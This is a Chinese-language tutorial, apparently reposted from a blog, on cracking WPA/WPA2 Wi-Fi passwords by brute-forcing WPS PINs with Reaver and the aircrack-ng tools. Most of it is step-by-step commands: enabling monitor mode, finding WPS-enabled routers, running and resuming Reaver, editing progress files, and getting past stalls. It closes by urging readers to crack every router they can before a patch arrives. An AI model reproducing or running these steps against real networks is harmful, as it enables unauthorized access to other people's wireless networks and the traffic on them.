wpa/wpa2无线网pin码破解
破解所需資料工具軟件集:http://www.400gb.com/u/156037
Reaver基本命令參數?
XiaoPanOS下:
???選擇“終端”輸入sudo thunar
???這里是為了取得超級權限,選擇系統文件-usr-local-ect-reave
???ifconfig?–a??????????????//確認你用哪一個網卡WLAN0或WLAN1
???airmon-ng start wlan0?????//開啟監聽模式
???wash?–i mon0?–C?????????//查看開啟wps的無線路由器
???airodump-ng mon0??????????//查看周邊AP信息(抓包)
???reaver?–i mon0?–b MAC?–a?–S?–vv?–d 3?–t 3??//開始窮舉PIN碼
???reaver?–i mon0?–b MAC?–a?–S?–vv?–d 0????????//加快速度為1秒
???reaver?–i mon0?–b MAC?–a?–S?–vv?–p xxxx?????//從前4位PIN碼開始
reave的進度表文件保存在:
???1.3版:/etc/reaver/MAC地址.wpc
???1.4版:/usr/local/etc/reaver/MAC地址.wpc
CDliunx下:
???選擇“終端”輸入sudo thunar
???這里是為了取得超級權限,選擇系統文件-usr-local-ect-reaver-
?
reaver必需的參數:
???-i, --interface=wlan Name of the monitor-mode interface to use??//監視模式接口使用的名稱
???-b, --bssid=mac BSSID of the target AP??????????????????//目標AP的SSID
?
reaver可選參數:
???-m, --mac=mac MAC of the host system???????//主機系統的MAC
???-e, --essid=ssid ESSID of the target AP????//目標AP的ESSID
???-c, --channel=channel Set the 802.11 channel for the interface (implies -f)????
????????//設置接口的802.11信道?(意味著?-f)
???-o, --out-file=file Send output to a log file [stdout]?????//輸出發送到一個日志文件
???-s, --session=file Restore a previous session file?????//恢復以前的記錄文件
???-C, --exec=command Execute the supplied command upon successful pin recovery????
????????//所提供的命令執行成功后,pin?恢復
???-D, --daemonize Daemonize reaver?????//守護進程?reaver
???-a, --auto Auto detect the best advanced options for the target AP????
????????//自動檢測目標AP的最先進的選項
???-f, --fixed Disable channel hopping?????//禁用信道跳頻
???-5, --5ghz Use 5GHz 802.11 channels?????//使用5GHz的802.11信道
???-v, --verbose Display non-critical warnings (-vv for more)?????//顯示非關鍵的警告(- VV更多)
???-q, --quiet Only display critical messages?????//僅顯示重要消息
???-h, --help Show help?????//顯示幫助
?
reaver高級選項:
???-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin???????//使用指定的4個或8個的?pin WPS
???-d, --delay=seconds Set the delay between pin attempts [1]?????//設置pin嘗試之間的延遲[1]
???-l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]????
????????//設置等待的時間,如果AP鎖定WPS PIN嘗試[60]
???-g, --max-attempts=num Quit after num pin attempts?????//退出后NUM pin嘗試
???-x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]????
????????//設定時間后進入休眠10[0]意外故障
???-r, --recurring-delay=xy Sleep for y seconds every x pin attempts?????//對每一個pin碼嘗試Y秒
???-t, --timeout=seconds Set the receive timeout period [5]?????//設置接收超時時間[5]
???-T, --m57-timeout=seconds Set the M5M7 timeout period [0.20]?????//設置M5M7超時期[0.20]
???-A, --no-associate Do not associate with the AP (association must be done by another application)????
????????//不要與AP關聯(協會必須由另一個應用程序進行)
???-N, --no-nacks Do not send NACK messages when out of order packets are received????
????????//不要發送NACK消息收到時,為了包出
???-S, --dh-small Use small DH keys to improve crack speed?????//使用小DH密鑰,以提高PJ速度
???-L, --ignore-locks Ignore locked state reported by the target AP?????//忽略鎖定狀態的目標AP
???-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet????
????????//終止每一個EAP失敗包WPS的記錄
???-n, --nack Target AP always sends a NACK [Auto]?????//目標AP發送一個NACK[自動]
???-w, --win7 Mimic a Windows 7 registrar [False]?????//模仿Windows 7的注冊處處長[虛假]
?
reaver?使用方法和技巧:
reaver使用方法:
???reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c?頻道
?????-i?監聽后接口名稱
?????-b?目標mac地址
?????-a?自動檢測目標AP最佳配置
?????-S?使用最小的DH key,可以提高PJ速度
?????-vv?顯示更多的非嚴重警告
?????-d?即delay每窮舉一次的閑置時間預設為1秒
?????-c?頻道
?????-p PIN碼四位或八位??//可以用8位直接找到密碼。
???當出現有百分數時你就可以用crtl+c來暫停,它會將reaver的進度表文件保存在
??????1.3版:/etc/reaver/MAC地址.wpc
??????1.4版:/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc)
??????用資源管理器,手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤或硬盤中,
??????下次重啟動后,再手工復制到/etc/reaver/?目錄下即可。
??????注意需要取得ROOT權限,才可將wpc文件復制到/etc/reaver/?目錄下:
??????在終端模擬里面輸入:
????????SUDO SU
????????SUDO THUNAR
?
reaver使用技巧:
??1、將mac地址.wpc?備份后,下次可以繼續使用。
??2、程序默認每嘗試后停止一秒,加入-d0參數使之不停止:
?????reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d0
??3、-p參數:-p PIN可以讓你在獲取到PIN的情況下直接得到路由WPA密碼!
?????reaver-i mon0 -b MAC -p PIN
??4、wpc結構
?????0??????//這個地方是說它的前4位PIN碼的進度位置數,真實位置要+4
?????0??????//這個地方是說后3位PIN數的已經運行測試位置數
?????0??????//0時沒有找到,當為1時找到前四位,當為2時全部找到。
?????下面是1萬個前四位數(reaver1.3版4位隨機數,1.4版是升序)
?????第4行起
?????0000
?????0001
?????.
?????.
?????9999
?????下面是1千個三位數(PIN第八位數是驗證碼)
?????從1004行起
?????000
?????.
?????.
?????999
????????所以前四位很重要,將已經知道的前四位放在最前面會提高你的PIN速度,我們也可以手動修改wpc文件第一行,如我們要從3000開始pin你可以將它修改為3004,這樣它就會從3000開始PIN了。當我們在PIN時就可以不用保存虛擬機快照了,只要你記住了前四位,你下載用軟件修改WPC文件就可了。???
?????cdlinux對wpc文件最方便,
?????beini和xiaopan對wpc修改要用命令vi來修改,
?????vi的使用方法很簡單viXXXX.wpc打開就可以了,
?????輸入i進行編輯,輸入escap退回命令模式,輸入:wq退出保存。
?
Pin碼重復出現死循環解決之道:
1.xiaopanOS環境解決之道:
當你看到PIN到一定程度,窗口里的PIN碼不變、進度百分比也不走,那么,保持原窗口不變,再點擊ROOTSHELL圖標,新開一個PIN窗口,輸入?“reaver -i mon0 -b?(正在PIN的目標MAC)?-a -s -vv?”(注意:這里“S”要小寫)?那么,你就會發現原來PIN的窗口,PIN碼開始改變,進度開始前進了!而且PIN的時間也大為縮短了!如果是破解到99.99%,執行此部操作就馬上彈出正確的pin碼和wifi密碼,以及路由器的SSID。
2.CDlinux環境解決之道:
當你看到PIN到一定程度,窗口里的PIN碼不變、進度百分比也不走,那么,請Ctrl+C停止,然后點擊[Reaver]按鈕,在彈出的窗口中輸入“-a -s?–vv“?(注意:這里“S”要小寫)?那么,你就會發現原來PIN的窗口,PIN碼開始改變,進度開始前進了!而且PIN的時間也大為縮短了!,如果是破解到99.99%,執行此部操作就馬上彈出正確的pin碼和wifi密碼,以及路由器的SSID。
若到90.9%或99.9%還是不出,也可以試試“reaver -i mon0 -b (正在PIN的目標MAC) -v -a -n [-c]”
時間及經驗總結,基本90.9%和99.9%的死循環,已經100%成功了,最后祝大家破解愉快!
?
用Reaver pin碼破特點:
1、不需要客戶端,
2、有PIN碼就能獲得無線密碼,
3、八位數PIN碼實際只有一萬一千組隨機密碼,
4、抓包、EWSA跑包,每個環節都有很大的不確定性。而PIN破密,只要開戶WPS,破密只是個時間問題。
提醒:大家還是早點都把能pin的路由都破了!可能馬上就有安全補救方案出來了!到時候就沒機會了,時不我待、只爭朝夕!
BT5、CDlinux、beini、xiaopan-OS都支持reaver運行。
reaver使用方法、步驟:
??? 打開超級終端?root shell?
??? 如果電腦裝有多個無線網卡,請先發指令ifconfig -a確認你用哪一個網卡WLAN0或WLAN1
下面的指令都是以單一網卡WLAN0為例
一、激活監聽模式:????airmon-ng start wlan0
二、查看周邊AP信息(抓包):airodump-ng??mon0
觀察要破AP的PWR信號強弱變化,注意同頻干擾,調整網卡放置位置和角度、方向。
PWR?小于?-75?基本上會Timeout, PWR-60左右,則非常順暢(2-6秒攻擊一次)
三、按Ctrl+C終止抓包
四、抓PIN碼:?reaver -i mon0 -b MAC -vv
例如:reaver -i mon0 -b C8:3A:35:F6:BB:B8 –vv
1.4版可用:reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v(可用一個v)
注意,MAC中冒號不可省略,MAC地址的字母大小寫均可,?-vv是兩個V不是W!
reaver1.3感覺比1.4更穩定些。
特別提示:只有AP開啟了WPS、QSS功能,才可以用PIN法破PSK密碼!
?
如何查看AP是否開了WPS、QSS呢?
一、使用指令: airodump -ng mon0
MB一欄下,出現54e.(看清楚有點“.”)是開WPS的
?
二、WIN7下,用通常的方式連接AP,如果在提示輸入密碼框下面,出現“通過按路由器按鈕也可以連接”,就確認此AP開了WPS、QSS。但是,WIN7下不出現“通過按路由器按鈕也可以連接”,不等于100%沒開WPS。還是?54e.?準。
AP關閉了WPS、或者沒有QSS滴,會出現“WARNING: Failed to associate with XX:XX:XX:XX:XX:XX??(ESSID: XXXX)”
?
??? PIN破密對信號要求極為嚴格,如果信號稍差,可能導致破密進度變慢或者路由死鎖等(重復同一個PIN碼 或?timeout)。
??? 特別是1、6默認頻道中,有較多的AP,相互干擾。因此,確定網卡放置的最佳位置、方向、角度十分重要。
????破解過程中重復同一個PIN碼或timeout可隨時隨地按Ctrl+C終止,reaver會自動保存進度。
若繼續破,則再次在終端中發送: reaver -i mon0 -b MAC -vv,這個命令運行后,會讓你選y或n,選y后就繼續了。
當reaver確定前4位PIN密碼后,其工作完成任務進度數值將直接跳躍至90.9%以上,也就是說只剩余一千個密碼組合了。
總共一萬一千個密碼。
如果,90.9%進程后死機或停機,請記下PIN前四位數,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位數)
????會從指定PIN段起破密。
?
如何保存破密進程呢:
reave的進度表文件保存在
1.3版:/etc/reaver/MAC地址.wpc
1.4版:/usr/local/etc/reaver/MAC地址.wpc
用資源管理器,手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤或硬盤中,下次重啟動后,再手工復制到/etc/reaver/?目錄下即可。CDLINUX下可以粘貼在CDLINUX的桌面上但就是不能粘貼在?usr/local/etc/reaver里面,
解決方法:
新開個窗口輸入?sudo thunar,這樣打開的文件管理器,具有root權限,可以拷貝文件到任何目錄了!
timeout時,可適當調整網卡方位,在同一PIN數值反復測試。也可Ctrl+C終止破密,讓路由器休息幾十秒,也是不錯的選擇,否則個別型號AP會自鎖PIN連接功能。
另外,也可以給命令增加2個參數,延長PIN窮舉和反饋的響應時間避免路由當機。
reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3
????-d?即delay每窮舉一次的閑置時間預設為1秒
????-t?即timeout每次窮舉等待反饋的最長時間
總結
以上是生活随笔為你收集整理的wpa/wpa2无线网pin码破解的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 常见服务器默认管理口地址
- 下一篇: 《广西经济社会发展报告(2019)》正式